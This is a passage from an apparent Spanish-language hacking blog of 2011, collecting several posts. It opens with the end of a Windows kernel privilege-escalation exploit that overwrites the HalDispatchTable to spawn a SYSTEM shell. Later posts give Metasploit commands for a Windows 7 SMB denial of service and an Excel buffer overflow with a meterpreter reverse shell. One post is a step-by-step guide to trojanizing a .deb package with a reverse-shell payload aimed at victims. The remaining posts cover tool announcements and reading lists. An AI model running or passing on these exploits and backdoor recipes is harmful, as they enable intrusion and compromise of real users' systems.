out  = c_ulong()
inp  = 0x1337
hola = ntdll.NtQueryIntervalProfile(inp, byref(out))
## Spawn a system shell, w00t!
print "[*] Spawning a SYSTEM shell..."
os.system("cmd.exe /T:C0 /K cd c:\\windows\\system32")
 
############################## POST EXPLOITATION ###############################
print "[*] Restoring token..."
## Restore the thingie
shellcode         = padding + restore_ptrs + restore_token
shellcode_size    = len(shellcode)
trail_padding     = (orig_size - shellcode_size) * "\x00"
shellcode        += trail_padding
shellcode_size   += (orig_size - shellcode_size)
## Write restore shellcode in userspace (dep)
kernel32.WriteProcessMemory(-1, shellcode_address_dep, shellcode,
                                   shellcode_size, byref(written))
## Write restore shellcode in userspace (nodep)
kernel32.WriteProcessMemory(-1, shellcode_address_nodep, shellcode,
                                   shellcode_size, byref(written))
## Overwrite HalDispatchTable once again
NTSTATUS = ntdll.ZwDeviceIoControlFile(client,
                                       None,
                                       None,
                                       None,
                                       byref(IoStatusBlock),
                                       IOCTL,
                                       inputbuffer,
                                       inputbuffer_size,
                                       outputbuffer,
                                       outputbuffer_size
                                       )
## Trigger restore shellcode
hola = ntdll.NtQueryIntervalProfile(inp, byref(out))
print "[+] Restore done! Have a nice day :)"

Lo acabo de probar en un computador público (y no muy actualizado) y el mayor problema que se me presentó fue que no tenia instalado python, pero simplemente bajo una versión Portable de Python y lo ejecuto, y funciona perfecto.

También lo probé en un Windows XP actualizado y ahí no funciono.

[+] Salu2
[+] Zion3R

[Video Metasploit] Ataque DoS en Window 7

noreply@blogger.com (Zion3R) — Mon, 28 Nov 2011 16:27:17 PST

Bueno, este video lo posteo para que practiquen con Metasploit y de manera "entretenida", es muy fácil de llevar a cabo. Y trata esencialmente de una vulnerabilidad para "dejar pegado" Windows 7.

Este módulo se aprovecha de una falla de denegación de servicio en el cliente SMB de Windows 7 y Windows Server 2008 R2. Para provocar este error, este módulo se ejecuta como un servicio y fuerza a un cliente vulnerable a acceder a la IP de este sistema como un servidor SMB. Esto se puede lograr mediante la incorporación de una ruta UNC (\HOST\share\something) en una página web. La víctima tiene que acceder a la URL entregada por Metasploit usando Internet Explorer, o un documento Word.

Bueno, les dejo un video para que vean el funcionamiento del Módulo:

Video hecho por Rahul Roshan www.teamnuts.in, www.rahulroshan.in

./msfconsole
use auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop
set SRVHOST 192.168.1.7
exploit

Opciones del módulo:

SRVHOST	Puerto Local a la escucha. (default: 0.0.0.0)
SRVPORT	Puerto a la escucha SMB (default: 445)
SSL	Negociación SSL para conexiones entrantes.
SSLVersion	Especifica la versión de SSL que debería ser usada (aceptada: SSL2, SSL3, TLS1) (default: SSL3)
ListenerComm	Especifica el canal de de comunicación para este servicio
WORKSPACE	Especifica el lugar de trabajo para este módulo
TCP::max_send_size	Máximo tamaño tcp. (0 = disable)
TCP::send_delay	Retraso entre cada envío. (0 = disable)

Referencias:

[+] Salu2

[+] Zion3R

[Video Metasploit] Troyanizando un paquete *.deb

noreply@blogger.com (Zion3R) — Mon, 21 Nov 2011 18:18:00 PST

Quiero postear este video que lo encontré bastante interesante y útil ya que una de las formas más faciles de acceder a un sistema es simplemente enviando un archivo infectado con cualquier tipo de malware (Troyano, keylogger, backdoor, etc...) a nuestra victima y que mejor forma para infectar un Linux que hacerle creer a la víctima que está instalando un simple paquete *.deb con un regalito dentro, a continuación el video y la explicación:

* Bajar el paquete a infectar:

apt-get --download-only install pakete

* Moverlo donde trabajaremos:

mv /var/cache/apt/archives/pakete /area/de/trabajo

* Extraerlo:

dpkg -x pakete work

* Crear la carpeta que nos ayudará para el payload de infección:

mkdir work/DEBIAN

* En el directorio "DEBIAN", crear un archivo llamado "control" que tenga lo siguiente (se modifica según necesidad):

Package: pakete
Version: 1000000000
Section: Games and Amusement
Priority: optional
Architecture: i386
Maintainer: Ubuntu MATU Developers (ubuntu-motu@lists.ubuntu.com)
Description: game

* También hay que crear el script de post-instalación que ejecutará nuestro binario. En "DEBIAN" creamos el archivo llamado "postinst" que contiene los siguiente:

#!/bin/sh
sudo chmod 2755 /usr/games/pakete_scores && /usr/games/pakete_scores & /usr/games/pakete &

* Cambiamos permisos a postinst:

chmod a+x postinst

* Ahora vamos a crear nuestro payload malicioso. Creamos una shell inversa para que se conecte de nuevo a nosotros llamada "pakete_scores".

./msfpayload linux/x86/shell/reverse_tcp LHOST=192.168.1.101 LPORT=4444 X > /area/de/trabajo/work/usr/games/pakete_scores

* Hacer el payload ejecutable, el archivo de construcción será llamado ".deb", lo cambiamos a pakete.deb:

dpkg-deb --build /area/de/trabajo/work

* Por último con msfconsole y con multi/handler seleccionamos el payload con el que infectaremos, más los parametros de LHOST y LPORT y esperamos a que la víctima lo instale.

Source: http://zerialkiller.blogspot.com/

[GoLISMERO] Simplificando tus Auditorías Webs

noreply@blogger.com (Zion3R) — Fri, 18 Nov 2011 03:56:59 PST

Hace poco me entero de una gran iniciativa en www.iniqua.com el cual me ha gustado, GoLISMERO creado por Dani, que consta principalmente de un spiders de urls que ayuda bastante para encontrar posibles SQLi y más. Los dejo con la info:

¿Qué es GoLISMERO?

GoLISMERO es un spider web capaz de detectar vulnerabilidades y formatear los resultados de forma muy útil cuando se afronta una auditoría web.

¿Para qué sirve?

GoLISMERO está pensado para ser un primer paso cuando comenzamos una auditoría de seguridad web.

Cada vez que nos enfrentamos a una nueva URL, ¿no sería genial poder disponer de forma sencilla y rápida de todos los enlaces, formularios con sus parámetros, detectar posibles URL vulnerables y que además de que se presentasen de manera que nos permita hacernos una idea de la todos los puntos de entrada donde podríamos lanzar ataques? GoLISMERO nos permite hacer todo esto.

Aprendiendo con ejemplos

A continuación se exponen diversos ejemplos y casos prácticos, que son la mejor forma de aprender a usar una herramienta de seguridad:

1.- Extraer todos los enlaces y formularios de una web, con todos sus parámetros, en formato extendido:

GoLISMERO.py -t google.com

2.- Extraer todos los enlaces, en modo compacto y colorear la salida.

GoLISMERO.py -c -m -t google.com

3.- Extraer solo los enlaces. Quitando css, javascript, imágenes y direcciones de correo.

GoLISMERO.py --no-css--no-script --no-images --no-mail -c -A links -m -t google.com

O, formato reducido:

GoLISMERO.py -na -c -A links -m -t google.com

4.- Extraer solamente los enlaces que tienen parámetros, seguir las redirecciones (HTTP 302) y exportar en HTML los resultados.

GoLISMERO.py -c -A links --follow -F html -o results.html -m -t google.com

Y el HTML de resultados generado:

5.- Extraer todos los enlaces, buscar URL potencialmente vulnerables y utilizar un proxy intermedio para el análisis. Las URLs o parámetros vulnerables serán resaltados en rojo.

GoLISMERO.py -c -A links --follow -na -x -m -t terra.com

Comprobamos como ZAP Proxy captura la petición:

El proyecto personalmente me gusto mucho, es muy útil para buscar posibles SQLi rápidamente sin tener que hacerlo a mano o recurrir a algún scan lento.

El script es muy rápido y como lo abran notado está hecho en python. Sin duda muy buena iniciativa.

Web del proyecto:
https://code.google.com/p/golismero/

Web del autor: http://www.iniqua.com/

[Video Metasploit] Microsoft Office 2007 Excel .xlb Buffer Overflow

noreply@blogger.com (Zion3R) — Thu, 10 Nov 2011 15:50:59 PST

Descripción:

Este módulo se aprovecha de una vulnerabilidad en Excel de Microsoft Office 2007. Mediante el suministro de un archivo con formato incorrecto *.xlb, un atacante puede controlar el contenido (código) de una rutina de memcpy, y el número de bytes a copiar, causando un stack- based buffer overflow. Esto da como resultado la ejecución de código arbitrario.

Comandos:

use exploit/windows/fileformat/ms11_021_xlb_bof
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21

getuid
sysinfo

Línea de tiempo:

Vulnerabilidad descubierta y reportado a la ZDI por Aniway

Vulnerabilidad reportada al proveedor por ZDI el 18/10/2010

Liberación coordinada de la vulnerabilidad del 04/12/2011

Metasploit PoC de proporcionado el 11/05/2011

PoC proporcionada por:

Aniway

abysssec

sinn3r

juan vazquez

Referencias:

CVE-2011-0105

MS11-021

ZDI-11-121

Versiones afectadas:

Microsoft Office XP Service Pack 3

Microsoft Office 2003 Service Pack 3

Microsoft Office 2007 Service Pack 2

Microsoft Office 2010 (32 y 64 bits edición)

Microsoft Office 2004 para Mac

Microsoft Office 2008 para Mac

Microsoft Office 2011 para Mac

Abrir archivos con formatos XML para Mac

Microsoft Excel Viewer Service Pack 2

Microsoft Office Compatibility Pack para Word, Excel y PowerPoint 2007 con Service Pack 2

Probado en Windows XP Pro SP3 con:

Microsoft Office Excel 2007 (12.0.4518.014)

Fuente: http://eromang.zataz.com/

Presentaciones y Videos OWASP AppSes USA 2011

noreply@blogger.com (Zion3R) — Thu, 03 Nov 2011 18:39:21 PDT

Paseándome por la red me encuentro con que se han publicado las presentaciones y videos de la OWASP AppSes USA 2011, y la verdad es que me gusta mucho la iniciativa OWASP que es un proyecto de código abierto dedicado al seguridad de aplicaciones Web. Si bien la documentación está en ingles, igual les dejo la noticia ya que están muy buenas.

El pasado 20 al 23 de septiembre se realizó en Minneapolis la OWASP AppSes USA 2011, la conferencia más grande de seguridad en aplicaciones y desarrollo de software. Ya se encuentran disponibles las presentaciones y videos para descarga:

Mark Curphey

Community - The Killer App (Video - starts at time marker 5:30, PDF)
Andrés Riancho

Web Application Security Payloads (PDF)
Andy Murren

SwA and the Cloud - Counting the Risks (PPTX)
Patrick Tatro

Principles of Patrolling: Applying Ranger School to Information Security (PPTX)
Arian Evans

Six Key Metrics: A look at the future of appsec
Jim Manico

Ghosts of XSS Past, Present and Future (PDF)
Shankar Babu Chebrolu, PhD, CISSP

Top Ten Risks with Cloud that will keep you Awake at Night (PPTX)
Ryan W Smith

STAAF: An Efficient Distributed Framework for Performing Large-Scale Android Application Analysis (PDF)
Charles Henderson

Global Security Report (PDF)
Shreeraj Shah

Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2) (PDF)
Scott Matsumoto

Threat Modeling in the Cloud: What You Don’t Know Will Hurt You! (PDF)
Tom Fischer

Lessons Learned Building Secure ASP.NET Applications (PDF)
John Benninghoff

Behavioral Security Modeling: Eliminating Vulnerabilities by Building Predictable Systems (PDF)
Michael Coates (Video, PDF)
Juan Galiana Lara

Pwning intranets with HTML5 (PDF)
Dan Cornell

The Self Healing Cloud: Protecting Applications and Infrastructure with Automated Virtual Patching (PDF)
Mike Park

Android Security, or This is not the Kind of "Open" I Meant... (PPTX)
Mike McCormick, Christophe Veltsos, Jeff Williams

Making it in Information Security and Application Security (PPT)
Todd Redfoot

Keeping up with the Web-Application Security (PPTX)
Matt Tesauro

Testing from the Cloud: Is the Sky Falling? (PDF)
Kevin Stadmeyer, Garrett Held

Hacking (and Defending) iPhone Applications (PPTX)
John B. Dickson, CISSP

Software Security: Is OK Good Enough? (PDF)
Jon McCoy (DigitalBodyGuard)

Hacking .NET (C#) Applications: The Black Arts (PDF)
Adrian Lane

CloudSec 12-Step (PDF)
Ashkan Soltani, Gerrit Padgham

When Zombies Attack - a Tracking Love Story (PDF)
Jeff Williams

AppSec Inception - Exploiting Software Culture (Prezi [Flash])
UNIVERSITY CHALLENGE WINNERS TALK! (Video, PPT)
Ira Winkler (Video, PPT)
Richard Struse

Software Assurance Automation throughout the Lifecycle (PPTX)
Michael Coates

Pure AppSec, No Fillers or Preservatives - OWASP Cheat Sheet Series (PDF)
Colin Watson

OWASP Codes of Conduct (PDF)
Dr. Bill Chu, Jing Xie

Secure Programming Support in IDE (PDF)
Brian Chess

Gray, the New Black: Gray-Box Web Penetration Testing (PPTX)
Ryan Stinson

Improve your SDLC with CAPEC and CWE (PPTX)
Jack Mannino, Zach Lanier, Mike Zusman

OWASP Mobile Top 10 Risks (PPTX)
Aditya K Sood, Richard Enbody

The Good Hacker - Dismantling Web Malware (PDF)
Chris Wysopal

Application Security Debt and Application Interest Rates (PPT)
Chuck Willis, Kris Britton

Sticking to the Facts: Scientific Study of Static Analysis Tools (PDF)
Simon Bennetts

Introducing the OWASP Zed Attack Proxy (PPTX)
Justin Collins, Tin Zaw

Brakeman and Jenkins: The Duo Detect Defects in Ruby on Rails Code (PPTX)
Mike Ware

Simplifying Threat Modeling (PDF)
Moxie Marlinspike (Video, PDF)
Adam Meyers

Mobile Applications Software Assurance (PDF)
Anthony J. Stieber

How NOT to Implement Cryptography for the OWASP Top 10 (PDF)
Michael Coates

Security Evolution - Bug Bounty Programs for Web Applications (PDF)
Wendy Nather (moderator), Dinis Cruz, Chris Eng, Jerry Hoff, Darren Meyer, John Steven, Sean Fay

Speeding Up Security Testing Panel (PPTX)
Charles Schmidt

You’re Not Done (Yet) - Turning Securable Apps into Secure Installations using SCAP (PPTX)
Beef (Chris Schmidt), Kevin Wall

ESAPI 2.0 - Defense Against the Dark Arts (PPT)
Jason Li

OWASP Projects Portal Launch! (5-10 Minutes) (PPTX)
Srini Penchikala

Messaging Security using GlassFish 3.1 and Open Message Queue (PDF)
Glenn Leifheit (moderator), Andreas Fuchsberger, Ajoy Kumar, Richard Tychansky, Alessandro Moretti

Application Security Advisory Board SDLC Panel (PPTX)
Michelle Moss, Nadya Bartol

Why do developers make these dangerous software errors? (PPTX)
Ryan Barnett

OWASP CRS and AppSensor Project (Prezi [Flash])
Alex Smolen

Application Security and User Experience (PDF)
Gunnar Peterson

Mobile Web Services

Fuente: http://blog.segu-info.com.ar/

FOCA 3.0 FREE Listo para la Descarga!

noreply@blogger.com (Zion3R) — Thu, 27 Oct 2011 20:21:34 PDT

Bueno, yo creo que ya muchos conocen la FOCA proyecto desarrollado por Informática 64, si no lo conocéis, me remito a copiar y pegar textual la descripción que está en la web.

FOCA es una herramienta para la realización de procesos de fingerprinting e information gathering en trabajos de auditoría web. La versión Free realiza búsqueda de servidores, dominios, URLs y documentos publicados, así como el descubrimiento de versiones de software en servidores y clientes. FOCA se hizo famosa por la extracción de metadatos en documentos públicos, pero hoy en día es mucho más que eso. Puedes obtener más información acerca de FOCA en los siguientes enlaces:

La versión 3.0 fue liberada y está lista para la descarga:

Descarga FOCA 3.0

También pueden descargarla metiéndose en http://www.informatica64.com/foca.aspx y registrando su email.

[+] Salu2

[+] Zion3R

Metasploit en un Apple TV 2G

noreply@blogger.com (Zion3R) — Thu, 27 Oct 2011 19:44:14 PDT

Xc0d3 me ha enviado un tutorial en el cual especifica como instalar y correr Metasploit en un Apple TV 2G. Apple TV es un media center que podemos conectar a nuestro televisor y a través de él acceder a diversos contenidos multimedia como fotos, películas, series, radios y vídeos en linea.

La instalación es muy parecida a la mayoría de instalaciones en un dispositivo Apple, pero nunca deja de ser util para alguien que tenga un Apple TV.

Descarga Turorial Cómo Instalar Metasploit en un Apple TV [PDF]

Agradezco mucho los aportes y agradezco a Xc0d3 por dedicar su tiempo.

[+] Salu2
[+] Zion3R
[+] P.D: Si quieres enviarme un Tutorial, Manual o aporte, puedes hacerlo mediante blackploit@gmail.com

Compilado de Textos de Pentesting

noreply@blogger.com (Zion3R) — Mon, 10 Oct 2011 18:19:12 PDT

Si eres uno de los que no nació sabiendo (como yo) y quieres tomarte enserio el tema del Pentest y/o Hacking, más te vale leer mucho y practicar mucho.

Hace poco que me llegó un mail de alguien que quería aprender de verdad y emprendí la tarea de encontrar todos aquellos texto que he leido (muchos los he imprimido) y han sido de ayuda para mi continuo aprendizaje y lo posteo aquí como un compilado para aquellos que les interese y motive el tema.

Dividí en 8 secciones los temas que según yo son los más importantes de aprender: Textos Seguridad Informática, Historia, Metasploit, SQLi, Windows, GNU\Linux, Cheat Sheets & Python.

├───Cheat Sheets - Packet Life
│       BGP.pdf
│       Cisco IOS Versions.pdf
│       Common ports.pdf
│       EIGRP.pdf
│       First Hop Redundancy.pdf
│       Frame Mode MPLS.pdf
│       IEEE 802.11 WLAN.pdf
│       IEEE 802.1X.pdf
│       IOS IPv4 Access Lists.pdf
│       IPsec.pdf
│       IPv4 Multicast.pdf
│       IPv4 Subnetting.pdf
│       IPv6.pdf
│       IS-IS.pdf
│       Markdown.pdf
│       MediaWiki.pdf
│       NAT.pdf
│       OSPF.pdf
│       Physical terminations.pdf
│       PPP.pdf
│       QoS.pdf
│       RIP.pdf
│       Scapy.pdf
│       Spanning Tree.pdf
│       Tcpdump.pdf
│       VLANs.pdf
│       VOIP Basics.pdf
│       Wireshark Display Filters.pdf
│
├───GNU-Linux
│       Administracion GNU Final (Español).pdf
│       ADMINISTRACIÓN DE UNIX (Español).PDF
│       Bash Pocket Reference.pdf
│       Creación de una distribución personalizada (Español).pdf
│       Enrutamiento avanzado y control de tráfico en Linux (Español).pdf
│       Expert Shell Scripting.pdf
│       Hungry Minds - Red Hat Linux 7.2 Bible Unlimited Ed.pdf
│       Implementacion Servidores Linux JULIO 2009 (Español).pdf
│       Linux Command Line and Shell Scripting Bible (2008).pdf
│       Linux Máxima Seguridad (Español).pdf
│       Pro Bash Programming - Scripting the GNU-Linux.pdf
│
├───Historia
│       UADv2.0 (Español).pdf
│       Un viaje en la historia del hacking (Español).pdf
│
├───Metasploit
│       Metasploit The Penetration Testers Guide.pdf
│       Metasploit Toolkit for Penetration Testing Exploit Development and Vulnerability Research.pdf
│       Metasploit Unleashed (Español).pdf
│       Metasploit Unleashed.pdf
│
├───Python
│       Introducción a la Programación con Python - Andrés Marzal e Isabel Gracia.pdf
│       Python para todos.pdf
│       Tutorial Python - Guido van Rossum.pdf
│
├───SQLi
│       An introduction to MySQL injection.pdf
│       BlackHat Europe 09 - Advanced SQL injection whitepaper.pdf
│       Blind MySQL Injection (Español).pdf
│       Blind SQL Injection.pdf
│       Hack x Crack SQLinjection (Español).pdf
│       MS SQL Injecting (Español).txt
│       My-SQL.pdf
│       SFX SQLi Paper (Español).pdf
│       SQL Injection Pocket Reference.pdf
│       SQL Injection Tutorial.pdf
│       SQL Injection White Paper.pdf
│       Tecnicas de SQL Injection Un Repaso (Español).pdf
│       Time-Based Blind SQL Injection using Heavy Queries.pdf
│       Técnicas de inyección en MySQL (Español).pdf
│
├───Textos Seguridad Informática
│       GUÍA DE PRUEBAS OWASP.pdf
│       Hacking Etico - Carlos Tori.pdf
│       OWASP Top 10 - 2010 FINAL.pdf
│       Taller Práctico de Auditoría y Pentest.pdf
│       Universidad Hacker.pdf
│
└───Windows
        Batch File Programming.pdf
        Windows Sysinternals Administrators Reference.pdf

En la sección de Textos Seguridad Informática incluí 5 textos que considero muy completos y de mucha ayuda, recomiendo partir por la Guía OWASP ya que incluye la mayoría de los temas relevantes en el Hacking muy bien explicados y tomados desde una perspectiva ética, y toman en cuenta 2 escenarios: Caja Negra (procedimientos de auditoria a una aplicación sin conocimiento del código fuente y sin información privilegiada) y Caja Blanca (cuando se tiene información total sobre la aplicación auditada, incluye también saber el código fuente). También incluí un texto que es un poco más práctico, Taller Práctico de Auditoria y Pentest, que va más por el lado del aprendizaje del uso de las herramientas necesarias en el pentest, sumamente útil y muy actualizado. Los otros 3 textos que puse los considero muy bueno y útiles, asiendo inca pie de que Hacking Ético por Carlos Tori hace poco que fue escrito por ende es muy actual.

En la sección Historia incluí 2 textos para los amantes más de la literatura que de los textos meramente técnicos recomiendo partir por Un Viaje por la historia del Hacking que es más corto y nos cuenta de los personajes emblema de esta temática. También incluí Uno al Día, texto que nos cuenta con bastante detalles y fechas las noticias y acontecimientos informaticos en los últimos años.

Consideré necesario hacer una sección Metasploit ya que es la herramienta emblema del hacking, ya es muy raro que dentro de la lista de herramientas de un Pentester no se encuentre está herramienta. Puse 4 textos, el que más destaco es Metasploit Unleashed (Español) ya que está bien detallado y emprende los módulos más importantes y usados de Mestasploit. Los otros textos son muy buenos también, pero están en inglés, si te manejas en eso, pues lee mejor Metasploit The Pentration Tester's Guide. Recordar que los textos son complementarios y de todos se puede sacar datos útiles.

En SQLi, incluí varios textos de la vulnerabilidad más masiva y de mayor criticidad. Es muy importante saber sobre está temática, ya que desde hace 20 años que existe esté problema con la seguridad de las bases de datos y seguirá estando vigente por mucho tiempo más. A mi me gusta bastante SQL Injection Pocket Reference ya que cuando uno sabe del tema solo basta recordar las sentencias para poder hacer una auditoria exitosa. Por lo demás, deje muchos otros textos que explican el tema y muchas de sus variantes. No os preocupéis si están en ingles los textos porque son muy entendibles.

En la sección Windows y en GNU/Linux, puse varios textos relevantes de estos sistemas operativos, son más de ayuda para la administración de estos S.O. serán de utilidad para entender más a fondo la estructura de los sistemas, pero no son fundamental su lectura.

También incluí la sección Cheat Sheets de Packet Life que están muy bien hechos, y como la memoria es volátil nunca esta demás tener una ayuda rápida para recordar.

Por ultimo iba a poner una sección de Lenguajes de Programación (que es indispensable saberlo si quieres tomarte el tema enserio), pero hubiese tenido que poner muchos textos de muchos lenguajes de programación influyentes y usados, así que preferí poner una sección sobre Python que creo que es el mejor lenguaje para aprender a programar. Si no sabes nada de Python parte por leerte Introducción al Lenguaje de Programación con Python por Andrés Marzal e Isabel Gracia, que es muy didáctico y muy detallista. También puse el Tutorial de Python hecho por el mismo creador de esté (Guido van Rossum) y también Python para Todos que es un texto muy recomendado siempre.

Y bueno, eso serían ALGUNOS textos sobre seguridad informática, siempre me han gustado los aportes, así que si ustedes tienen textos que consideren buenos y útiles por favor posteenlos en los comentarios, siempre se agradece.

Descarga Compilado de Textos de Pentesting

Contraseña: www.blackploit.com

[+] Salu2
[+] Zion3R

[Exploit Pack 1.0] Framework de Exploits para Pentest

noreply@blogger.com (Zion3R) — Thu, 13 Oct 2011 14:03:12 PDT

Exploit Pack con una licencia GPL (código libre) y python como motor de sus módulos, es un compilado de exploits muy parecido a Insect Pro (al parecer es la misma iniciativa más evolucionada).

Se ve bastante amable y versiones futuras promete, además que está disponible para todas los Sistemas operativos.

Un video de su funcionamiento:

Dowload Exploit Pack 1.0:

Microsoft Windows (XP, 2003, Vista, 2008 & 7) :

ExploitPack-1.0-i386.zip – Source
ExploitPack – 1.0 win32.zip – Binary win32
ExploitPack – 1.0 win64.zip – Binary win64

GNU/Linux (Debian, Redhat, Ubuntu 2.6):

ExploitPack-1.0-i386.tar.gz – Source

MAC OS X (10.4, 10.5 and 10.6) :

ExploitPack-1.0-i386.bzip – Source

Free BSD (7 & 8) :

E xploitPack-1.0-i386.tar.gz – Source

Web del Proyecto: http://exploitpack.com/

[+] Salu2
[+] Zion3R

[Hash Identifier] Identifica la Encriptación de tu Hash

noreply@blogger.com (Zion3R) — Fri, 30 Sep 2011 20:32:48 PDT

Hace algún tiempo estaba haciendo auditoria a una servidor, cuando descubro una clásica SQLi, bueno... Estaban comprometidas varias Bases de Datos, en una de las cuales habian muchos usuarios y sus respectivos passwords pero lamentablemente encriptados... Aquí un ejemplo del hash (password):

$P$B8nRWVEezB2Qysi6gZu8GYZhXluWU0/

En aquellos momentos no tenia idea con que algoritmo estaba encriptado, y me costó bastante saberlo, lo cual es sumamente necesario para poder descifrarlo con Hashcat u otro... Bueno, con un poco de tiempo libre he decido hacer un pequeño script en python para identificar que tipo de encriptación tienen los hashs...

El script puede ser muy perfeccionado aun, pero hasta el momento sirve de bastante ayuda... Los algoritmos de encriptación que identifica son:

ADLER-32
CRC-32
CRC-16
DES(Unix)
FCS-16
GHash-32-5
GOST R 34.11-94
Haval-160
Haval-192 110080 ,Haval-224 114080 ,Haval-256
Lineage II C4
Domain Cached Credentials
XOR-32
MD5(Half)
MD5(Middle)
MySQL
MD5(phpBB3)
MD5(Unix)
MD5(Wordpress)
MD5(APR)
MD2
MD4
MD5
MD5(HMAC(Wordpress))
NTLM
RAdmin v2.x
RipeMD-128
SNEFRU-128
Tiger-128
MySQL5 - SHA-1(SHA-1($pass))
MySQL 160bit - SHA-1(SHA-1($pass))
RipeMD-160
SHA-1
SHA-1(MaNGOS)
Tiger-160
Tiger-192
md5($pass.$salt) - Joomla
SHA-1(Django)
SHA-224
RipeMD-256
SNEFRU-256
md5($pass.$salt) - Joomla
SAM - (LM_hash:NT_hash)
SHA-256(Django)
RipeMD-320
SHA-384
SHA-256
SHA-384(Django)
SHA-512
Whirlpool
Entre otros...

Tengo que ser claro que en algunos casos da muchas posibilidades de hashs ya que no se puede saber si un hash es MD5, MD5 doble, MD5(Sha1), hasta que es desencriptado.

Aquí el proyecto:
http://code.google.com/p/hash-identifier/

Espero poder perfeccionar el script de modo de hacerlo lo más eficiente posible y espero su ayuda también, recibo criticas (constructivas XD) y hashs (con su respectivo algoritmo de encriptación) que no hayan sido identificados, para poder agregarlos futuramente...

[+] Salu2
[+] Zion3R

[BEAST] Cifrado SSL/TLS al Descubierto

noreply@blogger.com (Zion3R) — Wed, 28 Sep 2011 16:35:36 PDT

Dos investigadores encontraron la manera de romper el cifrado SSL/TLS, utilizado para garantizar la fiabilidad y privacidad de los datos que se intercambian entre los navegadores web y los servidores.

Las dos últimas versiones (1.1 y 1.2) de, protocolo de cifrado TLS no son vulnerables al exploit, pero la mayoría de las páginas web, servicios de mensajería instantánea y VPNs está utilizando la versión 1.0, que sí es vulnerable, porque es compatible con una amplia variedad de tecnologías web.

A diferencia de la mayoría de los ataques publicados contra HTTPS que se centran en la autenticación adecuada de SSL, Beast ataca la confidencialidad del protocolo, han explicado ambos investigadores a The Register, que aseguran además que BEAST implementa el primer ataque que actualmente descifra peticiones HTTPS.

En este paper [RAR] desarrollado por Thai Duong y Juliano Rizzo presenta el ataque chosen-plaintext contra SSL 3.0 y TLS 1.0 que permitió a sus autores desarrollar la aplicación BEAST, presentada ayer viernes en Ekoparty.

El paper además describe y presenta BEAST, que permite a un atacante descifrar y obtener los tokens de autenticación embebidos en el tráfico HTTPS. La obra resultante trabaja sobre los navegadores web más importantes al momento de escribir el trabajo en mayo de 2011.

Referencias:

Fuente:

--------------------------------------------------- EDIT ---------------------------------------------------

Acá un video del funcionamiento de BEAST:

[+] Salu2
[+] Zion3R

Lista de Comandos Post-Exploitation (Win, Linux & Mac)

noreply@blogger.com (Zion3R) — Thu, 22 Sep 2011 17:10:39 PDT

Les traigo 3 documentos por cortesía de una iniciativa en Room362.com donde se han elaborado listas de comandos útiles para después de una intrusión (Explotación) exitosa en los 3 sistemas operativos más populares (Windows, Linux y Mac).

Muy buena iniciativa, y lo mejor de todo es que todos podemos colaborar ampliando el material de estos textos alojados en Google Docs.

Les dejo a continuación los textos:
*Si desean descargar: File -> Download as -> Formato (pdf, html, texto...)

Windows Post-Exploitation Command List

Linux/Unix/BSD Post-Exploitation Command List

OSX Post-Exploitation Command List

Source: http://www.room362.com/

[+] Salu2